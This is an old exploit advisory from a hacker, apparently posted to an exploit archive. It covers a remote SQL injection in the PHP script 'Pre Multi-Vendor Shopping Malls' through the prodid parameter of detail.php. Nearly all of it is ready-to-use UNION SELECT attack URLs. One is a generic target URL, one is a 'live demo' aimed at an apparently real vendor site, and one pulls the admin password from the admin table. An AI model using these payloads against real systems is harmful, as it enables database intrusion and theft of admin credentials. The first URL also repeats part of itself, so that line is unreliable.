Pre Multi-Vendor Shopping Malls [id]Remote SQL Injection Vulnerability -------------------------------------------------------------------------------- ---------------------------------------------------------------- script : Pre Multi-Vendor Shopping Malls script : http://www.preprojects.com/pclphp.asp Risk : High ---------------------------------------------------------------- Dicovered by : d3b4g email : bl4ckend[at]gmail[dot]com Site. www.bl4ck3nd.info ---------------------------------------------------------------- Exploit : http://target.com/[path]/detail.php?prodid=detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* Live demo: http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* For admin : http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin/* # Rest find =P ---------------------------------------------------------------- ---------------------------------------------------------------- Greetz: str0ke,,Hotlism.org,All my friends ----------------------------------------------------------------- Proud to be a maldivian :)) =======================